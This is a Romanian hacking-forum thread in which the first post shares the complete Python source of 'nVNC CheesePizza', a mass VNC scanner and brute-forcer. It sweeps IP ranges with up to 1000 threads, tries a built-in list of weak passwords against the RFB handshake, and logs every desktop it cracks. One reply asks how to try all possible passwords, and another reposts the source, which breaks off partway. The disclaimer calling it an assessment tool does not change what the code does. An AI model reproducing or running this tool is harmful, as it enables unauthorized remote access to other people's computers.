Elohim Posted March 1, 2014 Report Posted March 1, 2014 (edited) nVNC CheesePizza SRCimport sysimport osimport cmdimport socketimport threadingimport pickleimport timefrom sys import stdoutfrom struct import pack, unpackVERSION = "0x203"CODENAME = "CheesePizza"DEFAULT_CONFIG = dict()CONFIG = dict()FILES = dict()FOLDERS = dict()DISCLAIMER = """~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~This is not a hacking tool, this is a security assessment tool.We do not encourage cracking or any other illicit activities thatput in danger the privacy or the informational integrity of others,and we certainly do not want this tool to be misused.!!! USE IT AT YOUR OWN RISK !!!~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"""DEFAULT_PASSWORDS = """112123123412345123456123456712345678letmeinadminadministpassword1212"""#============DEFAULT_CONFIG============#DEFAULT_CONFIG['scan_range'] = "192.168.*.*"DEFAULT_CONFIG['scan_port'] = "5900"DEFAULT_CONFIG['scan_timeout'] = "5"DEFAULT_CONFIG['scan_threads'] = "1000"DEFAULT_CONFIG['brute_threads'] = "500"DEFAULT_CONFIG['brute_timeout'] = "5"DEFAULT_CONFIG['auto_save'] = "true"DEFAULT_CONFIG['auto_brute'] = "true"#============DEFAULT_CONFIG============##============FILES============#FILES['results'] = {"folder": "output", "name":"results.txt"}FILES['ips'] = {"folder": "output", "name":"ips.txt"}FILES['passwords'] = {"folder": "input", "name":"passwords.txt"}FILES['config'] = {"folder": "nbin", "name":"config.conf"}FILES['ips.tmp'] = {"folder": "nbin", "name":"ips.tmp"}#============FILES============##============FOLDERS============#FOLDERS['output'] = "output"FOLDERS['input'] = "input"FOLDERS['nbin'] = "bin"#============FOLDERS============#class _baseDes(object): def __init__(self, mode=0, IV=None, pad=None, padmode=1): if IV: IV = self._guardAgainstUnicode(IV) if pad: pad = self._guardAgainstUnicode(pad) self.block_size = 8 if pad and padmode == 2: raise ValueError("Cannot use a pad character with 2") if IV and len(IV) != self.block_size: raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") self._mode = mode self._iv = IV self._padding = pad self._padmode = padmode def getKey(self): """getKey() -> bytes""" return self.__key def setKey(self, key): """Will set the crypting key for this object.""" key = self._guardAgainstUnicode(key) self.__key = key def getMode(self): """getMode() -> pyDes.ECB or pyDes.1""" return self._mode def setMode(self, mode): """Sets the type of crypting mode, pyDes.ECB or pyDes.1""" self._mode = mode def getPadding(self): """getPadding() -> bytes of length 1. Padding character.""" return self._padding def setPadding(self, pad): """setPadding() -> bytes of length 1. Padding character.""" if pad is not None: pad = self._guardAgainstUnicode(pad) self._padding = pad def getPadMode(self): """getPadMode() -> pyDes.1 or pyDes.2""" return self._padmode def setPadMode(self, mode): """Sets the type of padding mode, pyDes.1 or pyDes.2""" self._padmode = mode def getIV(self): """getIV() -> bytes""" return self._iv def setIV(self, IV): """Will set the Initial Value, used in conjunction with 1 mode""" if not IV or len(IV) != self.block_size: raise ValueError("Invalid Initial Value (IV), must be a multiple of " + str(self.block_size) + " bytes") IV = self._guardAgainstUnicode(IV) self._iv = IV def _padData(self, data, pad, padmode): if padmode is None: padmode = self.getPadMode() if pad and padmode == 2: raise ValueError("Cannot use a pad character with 2") if padmode == 1: if len(data) % self.block_size == 0: return data if not pad: pad = self.getPadding() if not pad: raise ValueError("Data must be a multiple of " + str(self.block_size) + " bytes in length. Use padmode=2 or set the pad character.") data += (self.block_size - (len(data) % self.block_size)) * pad elif padmode == 2: pad_len = 8 - (len(data) % self.block_size) if sys.version_info[0] < 3: data += pad_len * chr(pad_len) else: data += bytes([pad_len] * pad_len) return data def _unpadData(self, data, pad, padmode): # Unpad data depending on the mode. if not data: return data if pad and padmode == 2: raise ValueError("Cannot use a pad character with 2") if padmode is None: # Get the default padding mode. padmode = self.getPadMode() if padmode == 1: if not pad: pad = self.getPadding() if pad: data = data[:-self.block_size] + \ data[-self.block_size:].rstrip(pad) elif padmode == 2: if sys.version_info[0] < 3: pad_len = ord(data[-1]) else: pad_len = data[-1] data = data[:-pad_len] return data def _guardAgainstUnicode(self, data): if sys.version_info[0] < 3: if isinstance(data, unicode): raise ValueError("pyDes can only work with bytes, not Unicode strings.") else: if isinstance(data, str): try: return data.encode('ascii') except UnicodeEncodeError: pass raise ValueError("pyDes can only work with encoded strings, not Unicode.") return dataclass des(_baseDes): __pc1 = [56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3 ] __left_rotations = [ 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1 ] __pc2 = [ 13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9, 22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1, 40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47, 43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 ] __ip = [57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7, 56, 48, 40, 32, 24, 16, 8, 0, 58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6 ] __expansion_table = [ 31, 0, 1, 2, 3, 4, 3, 4, 5, 6, 7, 8, 7, 8, 9, 10, 11, 12, 11, 12, 13, 14, 15, 16, 15, 16, 17, 18, 19, 20, 19, 20, 21, 22, 23, 24, 23, 24, 25, 26, 27, 28, 27, 28, 29, 30, 31, 0 ] __sbox = [ [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13], [15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9], # S3 [10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12], # S4 [7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14], # S5 [2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3], # S6 [12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13], # S7 [4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12], # S8 [13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11], ] __p = [ 15, 6, 19, 20, 28, 11, 27, 16, 0, 14, 22, 25, 4, 17, 30, 9, 1, 7, 23,13, 31, 26, 2, 8, 18, 12, 29, 5, 21, 10, 3, 24 ] __fp = [ 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29, 36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25, 32, 0, 40, 8, 48, 16, 56, 24 ] ENCRYPT = 0x00 DECRYPT = 0x01 def __init__(self, key, mode=0, IV=None, pad=None, padmode=1): if len(key) != 8: raise ValueError("Invalid DES key size. Key must be exactly 8 bytes long.") _baseDes.__init__(self, mode, IV, pad, padmode) self.key_size = 8 self.L = [] self.R = [] self.Kn = [ [0] * 48 ] * 16 # 16 48-bit keys (K1 - K16) self.final = [] self.setKey(key) def setKey(self, key): """Will set the crypting key for this object. Must be 8 bytes.""" _baseDes.setKey(self, key) self.__create_sub_keys() def __String_to_BitList(self, data): """Turn the string data, into a list of bits (1, 0)'s""" if sys.version_info[0] < 3: data = [ord(c) for c in data] l = len(data) * 8 result = [0] * l pos = 0 for ch in data: i = 7 while i >= 0: if ch & (1 << i) != 0: result[pos] = 1 else: result[pos] = 0 pos += 1 i -= 1 return result def __BitList_to_String(self, data): """Turn the list of bits -> data, into a string""" result = [] pos = 0 c = 0 while pos < len(data): c += data[pos] << (7 - (pos % 8)) if (pos % 8) == 7: result.append(c) c = 0 pos += 1 if sys.version_info[0] < 3: return ''.join([ chr(c) for c in result ]) else: return bytes(result) def __permutate(self, table, block): """Permutate this block with the specified table""" return list(map(lambda x: block[x], table)) def __create_sub_keys(self): """Create the 16 subkeys K[1] to K[16] from the given key""" key = self.__permutate(des.__pc1, self.__String_to_BitList(self.getKey())) i = 0 self.L = key[:28] self.R = key[28:] while i < 16: j = 0 while j < des.__left_rotations[i]: self.L.append(self.L[0]) del self.L[0] self.R.append(self.R[0]) del self.R[0] j += 1 self.Kn[i] = self.__permutate(des.__pc2, self.L + self.R) i += 1 def __des_crypt(self, block, crypt_type): """Crypt the block of data through DES bit-manipulation""" block = self.__permutate(des.__ip, block) self.L = block[:32] self.R = block[32:] # Encryption starts from Kn[1] through to Kn[16] if crypt_type == des.ENCRYPT: iteration = 0 iteration_adjustment = 1 # Decryption starts from Kn[16] down to Kn[1] else: iteration = 15 iteration_adjustment = -1 i = 0 while i < 16: # Make a copy of R[i-1], this will later become L[i] tempR = self.R[:] # Permutate R[i - 1] to start creating R[i] self.R = self.__permutate(des.__expansion_table, self.R) # Exclusive or R[i - 1] with K[i], create B[1] to B[8] whilst here self.R = list(map(lambda x, y: x ^ y, self.R, self.Kn[iteration])) B = [self.R[:6], self.R[6:12], self.R[12:18], self.R[18:24], self.R[24:30], self.R[30:36], self.R[36:42], self.R[42:]] j = 0 Bn = [0] * 32 pos = 0 while j < 8: m = (B[j][0] << 1) + B[j][5] n = (B[j][1] << 3) + (B[j][2] << 2) + (B[j][3] << 1) + B[j][4] v = des.__sbox[j][(m << 4) + n] Bn[pos] = (v & 8) >> 3 Bn[pos + 1] = (v & 4) >> 2 Bn[pos + 2] = (v & 2) >> 1 Bn[pos + 3] = v & 1 pos += 4 j += 1 self.R = self.__permutate(des.__p, Bn) self.R = list(map(lambda x, y: x ^ y, self.R, self.L)) self.L = tempR i += 1 iteration += iteration_adjustment self.final = self.__permutate(des.__fp, self.R + self.L) return self.final def crypt(self, data, crypt_type): """Crypt the data in blocks, running it through des_crypt()""" if not data: return '' if len(data) % self.block_size != 0: if crypt_type == des.DECRYPT: raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n.") if not self.getPadding(): raise ValueError("Invalid data length, data must be a multiple of " + str(self.block_size) + " bytes\n. Try setting the optional padding character") else: data += (self.block_size - (len(data) % self.block_size)) * self.getPadding() if self.getMode() == 1: if self.getIV(): iv = self.__String_to_BitList(self.getIV()) else: raise ValueError("For 1 mode, you must supply the Initial Value (IV) for ciphering") i = 0 dict = {} result = [] while i < len(data): block = self.__String_to_BitList(data[i:i+8]) if self.getMode() == 1: if crypt_type == des.ENCRYPT: block = list(map(lambda x, y: x ^ y, block, iv)) processed_block = self.__des_crypt(block, crypt_type) if crypt_type == des.DECRYPT: processed_block = list(map(lambda x, y: x ^ y, processed_block, iv)) iv = block else: iv = processed_block else: processed_block = self.__des_crypt(block, crypt_type) result.append(self.__BitList_to_String(processed_block)) i += 8 if sys.version_info[0] < 3: return ''.join(result) else: return bytes.fromhex('').join(result) def encrypt(self, data, pad=None, padmode=None): data = self._guardAgainstUnicode(data) if pad is not None: pad = self._guardAgainstUnicode(pad) data = self._padData(data, pad, padmode) return self.crypt(data, des.ENCRYPT) def decrypt(self, data, pad=None, padmode=None): data = self._guardAgainstUnicode(data) if pad is not None: pad = self._guardAgainstUnicode(pad) data = self.crypt(data, des.DECRYPT) return self._unpadData(data, pad, padmode)class RFBProtocol: def __init__(self, host="69.193.118.223", password="1212", port=5901, timeout=5, shared=1): self.host = str(host) self.port = int(port) self.password = str(password) self.timeout = float(timeout) self.shared = int(shared) self.sock = None self.connected = False self.RFB = False self.null = False self.version = None self.name = None self.fail_message = None def connect(self): try: self.conn_init() self.client_auth() except Exception as ex: pass def close(self): self.sock.close() def conn_init(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.settimeout(self.timeout) self.sock.connect((self.host, self.port)) result = self.sock.recv(12) if result[:3] == "RFB": self.RFB = True self.sock.send("RFB 003.003\n") else: raise Exception("Not RFB") def client_auth(self): result = self.sock.recv(4) (method,) = unpack("!I", result) if method == 0: (lenght,) = unpack("!I", self.sock.recv(4)) self.fail_message = self.sock.recv(int(lenght)) raise Exception(self.fail_message) elif method == 1: self.null = True self.client_init() elif method == 2: self.vnc_auth() else: raise Exception("Unsupported auth method") def vnc_auth(self): challenge = self.sock.recv(16) self.send_password(challenge) (result,) = unpack("!I", self.sock.recv(4)) self.status_code = result if result == 0: self.client_init() elif result == 1: raise Exception("WRONG PASSWORD") def client_init(self): self.connected = True self.sock.send(pack("!B", self.shared)) result = self.sock.recv(24) (width, height, pixformat, namelen) = unpack("!HH16sI", result) self.name = self.sock.recv(namelen) def send_password(self, challenge): password = (self.password + '\0' * 8)[:8] response = self.des_enc(password, challenge) self.sock.send(response) def des_enc(self, key, string): newkey = [] for ki in range(len(key)): bsrc = ord(key[ki]) btgt = 0 for i in range(8): if bsrc & (1 << i): btgt = btgt | (1 << 7-i) newkey.append(chr(btgt)) DES = des("".join(newkey)) return DES.encrypt(string)class MiscFunctions: def is_int(self, string): try: int(string) return True except ValueError: return False def is_float(self, string): try: float(string) return True except ValueError: return False def is_bool(self, string): if string.lower() in ("true", "false"): return True else: return False def save_config(self): Files.file_write(FILES['config'], pickle.dumps(CONFIG))class FilesHandler: def __init__(self): self.sep = os.sep self.root_path = os.getcwd() + self.sep def file_get_contents(self, location): if self.file_exists(location): return open(location).read() else: return False def file_write(self, location, data="", mode="w"): if mode=="i": oldf = open(location).read() f = open(location, 'w') f.write(data.rstrip() + '\n' + oldf.rstrip()) f.close() else: f = open(location, mode) f.write(data) f.close() def file_empty(self, location): try: if os.path.getsize(location) > 0: return False else: return True except OSError: return True def file_exists(self, file_path): return os.path.isfile(file_path) def dir_exists(self, dir_path): if os.path.exists(dir_path) and (not os.path.isfile(dir_path)): return True else: return False def dirname(self, path): return os.path.dirname(path) def mkdir(self, path): try: os.makedirs(path) except OSError: passlistclass Deploy: def __init__(self): self.deploy_folders() self.deploy_files() def deploy_folders(self): for (key, folder) in FOLDERS.items(): folder = Files.root_path + folder + Files.sep FOLDERS[key] = folder if not Files.dir_exists(folder): Files.mkdir(folder) def deploy_files(self): for (key, file) in FILES.items(): file = FOLDERS[file['folder']] + file['name'] FILES[key] = file if not Files.file_exists(file): Files.file_write(file) if Files.file_empty(FILES['config']): Files.file_write(FILES['config'], pickle.dumps(DEFAULT_CONFIG)) if Files.file_empty(FILES['passwords']): Files.file_write(FILES['passwords'], DEFAULT_PASSWORDS)class Display: def __init__(self): pass def delimiter(self, string): stdout.write("\n" + ("-" * len(string)) + "\n") def getTerminalSize(self): current_os = os.name tuple_xy=None if current_os in ('nt','dos','ce'): tuple_xy = self._getTerminalSize_windows() if tuple_xy is None: tuple_xy = self._getTerminalSize_tput() if current_os == 'posix': tuple_xy = self._getTerminalSize_linux() if tuple_xy is None: tuple_xy = (80, 25) return tuple_xy def _getTerminalSize_windows(self): res=None try: from ctypes import windll, create_string_buffer h = windll.kernel32.GetStdHandle(-12) csbi = create_string_buffer(22) res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi) except: return None if res: import struct (bufx, bufy, curx, cury, wattr, left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw) sizex = right - left + 1 sizey = bottom - top + 1 return sizex, sizey else: return None def _getTerminalSize_tput(self): try: import subprocess proc=subprocess.Popen(["tput", "cols"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) output=proc.communicate(input=None) cols=int(output[0]) proc=subprocess.Popen(["tput", "lines"],stdin=subprocess.PIPE,stdout=subprocess.PIPE) output=proc.communicate(input=None) rows=int(output[0]) return (cols,rows) except: return None def _getTerminalSize_linux(self): def ioctl_GWINSZ(fd): try: import fcntl, termios, struct, os cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,'1234')) except: return None return cr cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2) if not cr: try: fd = os.open(os.ctermid(), os.O_RDONLY) cr = ioctl_GWINSZ(fd) os.close(fd) except: pass if not cr: try: cr = (env['LINES'], env['COLUMNS']) except: return None return int(cr[1]), int(cr[0]) def posvals(self,val='x'): self.size = self.getTerminalSize() self.tx = self.size[0] self.ty = self.size[1] if val=='x': return self.tx else: return self.ty def clearscreen(self): if os.name in ("nt", "dos", "ce"): os.system("CLS") elif os.name == "posix": os.system("clear") else: stdout.write("\n"*150) self.banner() def banner(self): banner = list() banner.append("|>>>> - nVNC Scanner - %s - %s - <<<<|" % (VERSION, CODENAME)) banner.append("Scan Threads: %s <-> Scan Timeout: %s <-> Scan Port: %s" % (CONFIG['scan_threads'], CONFIG['scan_timeout'], CONFIG['scan_port'])) banner.append("Brute Threads: %s <-> Brute Timeout: %s <-> Auto Brute: %s" % (CONFIG['brute_threads'], CONFIG['brute_timeout'], CONFIG['auto_brute'])) banner.append("Scan Range: %s <-> Auto Save: %s" % (CONFIG['scan_range'], CONFIG['auto_save'])) stdout.write("\n") for line in banner: stdout.write(line.center(self.posvals())) if 'nVNC' in line: stdout.write('\n') stdout.write("\n\n") def disclaimer(self): for line in DISCLAIMER.split('\n'): stdout.write(line.center(self.posvals()))class NetTools: def convert_ip(self, string): if self.is_ip(string.strip()): return [self.ip2int(string.strip())] else: return False def convert_range(self, string): if string.count('-') == 1: string = string.strip().split('-') if self.is_ip(string[0]) and self.is_ip(string[1]): string = [self.ip2int(x) for x in string] string.sort() return string elif string.count('*') in (1,2,3): if self.is_ip(string.replace('*', '0')): return [self.ip2int(string.replace('*', '0')), self.ip2int(string.replace('*', '255'))] else: return False def is_range(self, string): if string.count('-') == 1: string = string.strip().split('-') if self.is_ip(string[0]) and self.is_ip(string[1]): return True elif string.count('*') in (1,2,3): if self.is_ip(string.replace('*', '0')): return True else: return False def is_ip(self, address='0.0.0.0'): try: octets = address.split('.') if len(octets) == 4: ipAddr = "".join(octets) if ipAddr.isdigit(): if (int(octets[0]) >= 0) and (int(octets[0]) <= 255): if (int(octets[1]) >= 0) and (int(octets[1]) <= 255): if (int(octets[2]) >= 0) and (int(octets[2]) <= 255): if (int(octets[3]) >= 0) and (int(octets[3]) <= 255): return True except IndexError: pass except ValueError: pass return False def ip2int(self, ip): ip = ip.split(".") return int("%02x%02x%02x%02x" % (int(ip[0]),int(ip[1]),int(ip[2]),int(ip[3])),16) def int2ip(self, integer): integer = "%08x" % (integer) return "%i.%i.%i.%i" % (int(integer[0:2],16),int(integer[2:4],16),int(integer[4:6],16),int(integer[6:8],16))class Interface: def Start(self): self.main_console().cmdloop() class main_console(cmd.Cmd): prompt = ("+>").rstrip() ruler = "~" def default(self, line): stdout.write("\n\tNope.\n\n") #==========MISC COMMANDS==========# def do_disclaimer(self, line): Display.disclaimer() def do_add(self, line): line = line.lower().split(" ") if len(line) == 2 and line[0] and line[1]: if line[1] in FILES.keys(): Files.file_write(FILES[line[1]], line[0], 'i') stdout.write("\n\t[OK]\n") else: stdout.write("\n\t[ERROR]\n") else: stdout.write("\n\t[ERROR]\n") time.sleep(0.5) Display.clearscreen() def do_flush(self, line): line = line.lower().split(" ") if len(line) == 1 and line[0]: if line[0] in FILES.keys(): Files.file_write(FILES[line[0]]) stdout.write("\n\t[OK]\n") elif line[0].strip() in ("all", "everything"): for file in FILES.keys(): if file != "config": Files.file_write(FILES[file]) stdout.write("\n\t[OK]\n") else: stdout.write("\n\t[ERROR]\n") time.sleep(0.5) Display.clearscreen() def do_clear(self, line): Display.clearscreen() def do_cls(self,line): self.do_clear(line) def do_exit(self, line): sys.exit("Bye.") def do_quit(self, line): self.do_exit(line) def do_q(self, line): self.do_exit(line) #==========MISC COMMANDS==========# #==========SCAN COMMAND===========# def do_scan(self, line): line = line.lower().split(" ") if len(line) == 1 and line[0] != "": if NetTools.is_range(line[0]): stdout.write("\n\t[OK]\n") CONFIG['scan_range'] = line[0] else: stdout.write("\n\t[ERROR]\n") stdout.write("\n") ScanEngine.Start() #==========SCAN COMMAND===========# #==========BRUTE COMMAND===========# def do_brute(self, line): stdout.write("\n") BruteEngine.Start() #==========BRUTE COMMAND===========# #==========SET COMMAND===========# def do_set(self, line): OK = False line = line.lower().split(" ") if len(line) == 2 and line[0] in CONFIG.keys(): if line[0] == "scan_range" and NetTools.is_range(line[1]): OK = True elif line[0] in ("scan_threads", "brute_threads", "scan_port") and Misc.is_int(line[1]): OK = True elif line[0] in ("scan_timeout", "brute_timeout") and Misc.is_float(line[1]): OK = True elif line[0] in ("auto_brute", "auto_save") and Misc.is_bool(line[1]): OK = True if OK: CONFIG[line[0]] = line[1] stdout.write("\n\t[OK]\n") else: stdout.write("\n\t[ERROR]\n\n") else: stdout.write("\n\t[ERROR]\n\n") if CONFIG['auto_save'] == "true": Misc.save_config() time.sleep(0.5) Display.clearscreen() #==========SET COMMAND===========# #==========SHOW COMMAND===========# def do_show(self, line): line = line.lower() if line in ("results", "result", "brute"): stdout.write("\nBrute Results") Display.delimiter("Brute Results") for line in open(FILES['results'], 'r').readlines(): if line.strip() != "": stdout.write("%s\n" % line.strip()) Display.delimiter("Brute Results") elif line in ("ips", "scan", "ip"): stdout.write("\nScan Results") Display.delimiter("Scan Results") for line in open(FILES['ips'], 'r').readlines(): if line.strip() != "": stdout.write("%s\n" % line.strip()) Display.delimiter("Scan Results") elif line in ("password", "passwords", "pass"): stdout.write("\nPasswords") Display.delimiter("Passwords") for line in open(FILES['passwords'], 'r').readlines(): if line.strip() != "": stdout.write("%s\n" % line.strip()) Display.delimiter("Passwords") else: stdout.write("\nSettings") Display.delimiter("Settings") for (config, value) in CONFIG.items(): stdout.write("%s = %s\n" % (config, value)) Display.delimiter("Settings") stdout.write("\n") #==========SHOW COMMAND===========#class ScanEngine: def __init__(self): pass def init(self): global lock, semaphore lock = threading.Lock() semaphore = threading.Semaphore(int(CONFIG['scan_threads'])) self.ips_file = open(FILES['ips'], 'a', 0) self.current = 0 self.found = 0 self.range = NetTools.convert_range(CONFIG['scan_range']) self.total = int(self.range[1]) - int(self.range[0]) def Start(self): self.init() output_thread = threading.Thread(target=self.output_thread, args=()) output_thread.daemon = True output_thread.start() try: integer = self.range[0] while integer <= self.range[1]: semaphore.acquire() thread = threading.Thread(target=self.scan_thread, args=(integer,)) thread.daemon=True thread.start() integer += 1 self.current += 1 except: stdout.flush() stdout.write("\n\tSome thread related error occured, try lowering the threads amount.\n") while threading.active_count() > 1: pass self.ips_file.close() if CONFIG['auto_brute'] == "true": BruteEngine.Start() else: stdout.write("\n\nDONE! Check \"output/ips.txt\" or type \"show ips\"!\n\n") def scan_thread(self, integer): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(float(CONFIG['scan_timeout'])) sock.connect((NetTools.int2ip(integer), int(CONFIG['scan_port']))) lock.acquire() self.found += 1 self.ips_file.write("%s:%i\n" % (NetTools.int2ip(integer), int(CONFIG['scan_port']))) lock.release() except: pass semaphore.release() def output_thread(self): try: while self.total >= self.current: time.sleep(0.5) stdout.flush() stdout.write("\r Current [%i/%i] Found: %i " % (self.current, self.total, self.found)) except: passclass BruteEngine: def __init__(self): pass def init(self): global lock, semaphore lock = threading.Lock() semaphore = threading.Semaphore(int(CONFIG['brute_threads'])) self.results = open(FILES['results'], 'a', 0) self.passwords = list() self.servers = list() self.current_password = None self.output_kill = False self.get_passwords() self.get_servers() def Start(self): self.init() if self.passwords is not False: if self.servers is not False: output_thread = threading.Thread(target=self.output_thread, args=()) output_thread.daemon = True output_thread.start() for self.current_password in self.passwords: try: for server in self.servers: semaphore.acquire() thread = threading.Thread(target=self.brute_thread, args=( server, self.current_password )) thread.daemon=True thread.start() except: stdout.flush() stdout.write("\n\tSome thread related error occured, try lowering the threads amount.\n") while threading.active_count() > 2: pass self.output_kill = True self.results.close() stdout.write("\n\nDONE! Check \"output/results.txt\" or type \"show results\"!\n\n") else: stdout.write("\n\tThere are no scanned ips.\n") else: stdout.write("\n\tThere are no passwords.\n") def brute_thread(self, server, password): try: rfb = RFBProtocol(server[0], password, server[1], CONFIG['brute_timeout']) rfb.connect() rfb.close() lock.acquire() if rfb.RFB: if rfb.connected: self.servers.pop(self.servers.index(server)) if rfb.null: password = "null" self.results.write("%s:%i-%s-[%s]\n" % (str(server[0]), int(server[1]), password, rfb.name)) stdout.flush() stdout.write("\r[*] %s:%i - %s \n\n" % (str(server[0]), int(server[1]), password)) lock.release() except KeyboardInterrupt: return except: pass semaphore.release() def output_thread(self): while not self.output_kill: try: if self.current_password != None: stdout.flush() stdout.write("\r Trying \"%s\" on %i servers " % (self.current_password, len(self.servers))) time.sleep(0.2) except: pass def get_passwords(self): if not Files.file_empty(FILES['passwords']): for line in open(FILES['passwords'], 'r').readlines(): if line.strip != "": self.passwords.append(line.strip()) else: self.passwords = False def get_servers(self): if not Files.file_empty(FILES['ips']): for line in open(FILES['ips'], 'r').readlines(): if line.count(":") == 1: line = line.strip().split(":") if NetTools.is_ip(line[0]) and Misc.is_int(line[1]): self.servers.append([line[0], int(line[1])]) elif NetTools.is_ip(line.strip()): self.servers.append([line.strip(), CONFIG['scan_port']]) else: self.servers = Falseclass MainEngine: def __init__(self): global Files, NetTools, Deploy, Display, Interface, ScanEngine, BruteEngine, Misc Files = FilesHandler() NetTools = NetTools() Deploy = Deploy() Misc = MiscFunctions() Display = Display() ScanEngine = ScanEngine() BruteEngine = BruteEngine() Interface = Interface() def Start(self): self.load_config() Display.clearscreen() Interface.Start() def load_config(self): global CONFIG CONFIG = pickle.load(open(FILES['config']))if __name__ == "__main__": try: MainEngine = MainEngine() MainEngine.Start() except KeyboardInterrupt: if CONFIG['auto_save'] == "true": Misc.save_config() sys.exit("\n\n\t...Exiting...\n")Source: TF.comA fost postat programul compilat, aici este doar sursa Edited October 21, 2014 by Elohim 1 1 Quote
aKmquaSe Posted November 11, 2014 Report Posted November 11, 2014 Salut , sti cumva ce trebe adaugat pentru ami scana toate parolele posibile ? Quote
poweromania123 Posted November 12, 2014 Report Posted November 12, 2014 nVNC CheesePizza SRCimport sysimport osimport cmdimport socketimport threadingimport pickleimport timefrom sys import stdoutfrom struct import pack, unpackVERSION = "0x203"CODENAME = "CheesePizza"DEFAULT_CONFIG = dict()CONFIG = dict()FILES = dict()FOLDERS = dict()DISCLAIMER = """~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~This is not a hacking tool, this is a security assessment tool.We do not encourage cracking or any other illicit activities thatput in danger the privacy or the informational integrity of others,and we certainly do not want this tool to be misused.!!! USE IT AT YOUR OWN RISK !!!~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"""DEFAULT_PASSWORDS = """112123123412345123456123456712345678letmeinadminadministpassword1212"""#============DEFAULT_CONFIG============#DEFAULT_CONFIG['scan_range'] = "192.168.*.*"DEFAULT_CONFIG['scan_port'] = 